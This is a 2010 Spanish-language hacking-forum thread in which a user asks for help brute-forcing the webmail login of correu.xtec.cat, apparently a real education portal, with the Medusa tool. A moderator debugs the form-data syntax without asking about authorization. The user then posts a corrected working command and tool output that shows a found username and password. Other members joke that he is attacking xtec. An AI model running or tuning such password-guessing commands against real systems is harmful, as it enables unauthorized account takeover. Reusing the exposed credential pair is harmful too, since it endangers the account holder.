elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 14:57  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  MEDUSA WEB-FORM		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MEDUSA WEB-FORM  (Leído 2,448 veces)
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
MEDUSA WEB-FORM
« en: 28 Abril 2010, 23:25 »
Buenasss

mirad estoy haciendo pruebas con el medusa pero tengo un problema.
segun tengo entendido el problema esta en form-data pero no acabo de entender como funciona..

La orden que uso es la siguiente:

medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Si alguien puede ayudarme ;P
En línea
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #1 en: 29 Abril 2010, 15:14 »

Que tal.

Podrias poner que error te suelta?? Siempre dad la maxima info posible (errores...etc.) cuando pidais ayuda para un error como este.

Que version de Medusa usas ?


SaluDoS.
En línea
"La envidia es una declaración de inferioridad"
Napoleón.
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #2 en: 29 Abril 2010, 17:04 »
pos mira cuando ejecuto la orden solo hace la primera palabra de la wordlist:

GENERAL: Module parameter: FORM:iwc_static/layout/login.html
GENERAL: Module parameter: FORM-DATA:post?user=&pass
GENERAL: Module parameter: DENY-SIGNAL:incorrect
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 10000

ACCOUNT CHECK: [web-form] Host: correu.xtec.cat (1 of 1, 0 complete) User: rstein2 (1 of 1, 0 complete) Password: rs0001 (1 of 10000 complete)
ACCOUNT FOUND: [web-form] Host: correu.xtec.cat User: rstein2 Password: rs0001 [SUCCESS]

INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - Current user password list is complete, rescanning userlist for unfinished credentials.
INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - No more user accounts available for testing.
INFO: Login Module: 0 - No more users/passwords available in the normal queue.
INFO: Login Module: 0 - No additional missed users/passwords, setting credential status to CREDENTIAL_DONE.
GENERAL: Medusa has finished.
En línea
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #3 en: 29 Abril 2010, 17:05 »
aa y la versión que uso es la v2.0
En línea
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #4 en: 29 Abril 2010, 18:52 »

Que tal.


Citar
medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Primero, prueba a poner un "=" (sin comillas) tras pass. O sea, que quede &pass=

Ademas, mira en el source del (x)HTML como el form esta elaborado. Si hay algun value para inputs tipo hidden a*adelos, y si Submit tiene un value (por ejemplo submit) pondlo en la cadena para -m FORM tambien.


Bueno prueba y ve diciendo  ;)


Saludos.
En línea
"La envidia es una declaración de inferioridad"
Napoleón.
TRICKY
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.605


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #5 en: 29 Abril 2010, 19:18 »

Citar
iwc_static/layout/login.html
??

No sera un .php ???
Mira a ver hacia donde apunta el METHOD del form .. y asegurate que va sobre POST!


Saludos.
En línea
"La envidia es una declaración de inferioridad"
Napoleón.
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #6 en: 30 Abril 2010, 19:27 »
Ei ya he encontrado mi problema!!
Usando el HTTP live headers he podido ver que me habia equivocado en el form-data.
La orden que tengo que usar es esa:

medusa -u user -P /diccionaris/rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"fromlogin=true&username=&pass=" -m DENY-SIGNAL:"El" -h correu.xtec.cat -F

gracias por la ayuda ;P
En línea
Debci
Wiki

Desconectado Desconectado

Mensajes: 1.945


Actualizate o muere!


Ver Perfil WWW
Re: MEDUSA WEB-FORM
« Respuesta #7 en: 30 Abril 2010, 23:40 »
Hay.... que li vols fer a l´xtec?

Salutacions...
En línea


Juega a este pedazo de MMORPG y consigue premios registrandote como referido mio! League of Legends
dazoverride

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #8 en: 1 Mayo 2010, 19:43 »
XD xtec? jajajajaja

això em sona :P no seas malooo !!
En línea
Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #9 en: 2 Mayo 2010, 18:51 »
jajaja yo acer algo malo a la xtec?
nunca de la vida ;)
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cual seria el nombre de host para un web-form con medusa?
Hacking Básico 		KalmeniduS 0 1,013 Último mensaje 15 Febrero 2011, 07:30
por KalmeniduS
Medusa web form
Hacking Básico 		gettingold 0 813 Último mensaje 21 Octubre 2011, 12:55
por gettingold
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines